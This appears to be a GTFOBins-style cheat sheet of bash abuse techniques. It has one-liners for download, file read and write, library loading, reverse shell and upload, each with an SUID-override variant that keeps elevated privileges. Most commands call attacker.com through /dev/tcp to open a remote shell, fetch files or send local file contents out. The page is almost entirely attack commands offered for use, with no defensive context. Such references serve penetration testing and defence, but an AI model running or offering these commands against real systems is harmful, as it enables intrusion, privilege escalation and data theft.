bash

Download

bash -c '{ echo -ne "GET /path/to/input-file HTTP/1.0\r\nhost: attacker.com\r\n\r\n" 1>&3; cat 0<&3; } \
    3<>/dev/tcp/attacker.com/12345 \
    | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } >/path/to/output-file'

SUID override:

bash -p -c '{ echo -ne "GET /path/to/input-file HTTP/1.0\r\nhost: attacker.com\r\n\r\n" 1>&3; cat 0<&3; } \
    3<>/dev/tcp/attacker.com/12345 \
    | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } >/path/to/output-file'

bash -c 'echo "$(</dev/tcp/attacker.com/12345) >/path/to/output-file'

SUID override:

bash -p -c 'echo "$(</dev/tcp/attacker.com/12345) >/path/to/output-file'

File Read

bash -c 'echo "$(</path/to/input-file)"'

SUID override:

bash -p -c 'echo "$(</path/to/input-file)"'

This only works interactively from an existing `bash` session.

HISTTIMEFORMAT=$'\r\e[K'
history -c
history -r /path/to/input-file
history

File Write

bash -c 'echo DATA >/path/to/output-file'

SUID override:

bash -p -c 'echo DATA >/path/to/output-file'

This only works interactively from an existing `bash` session. It adds timestamps to the output file.

HISTIGNORE='history *'
history -c
DATA
history -w /path/to/output-file

Library Load

bash -c 'enable -f /path/to/lib.so x'

SUID override:

bash -p -c 'enable -f /path/to/lib.so x'

Reverse Shell

bash -c 'exec bash -i &>/dev/tcp/attacker.com/12345 <&1'

SUID override:

bash -p -c 'exec bash -p -i &>/dev/tcp/attacker.com/12345 <&1'

Shell

bash

SUID override:

bash -p

Upload

bash -c 'echo -e "POST / HTTP/0.9\n\n$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'

SUID override:

bash -p -c 'echo -e "POST / HTTP/0.9\n\n$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'

bash -c 'echo -n "$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'

SUID override:

bash -p -c 'echo -n "$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'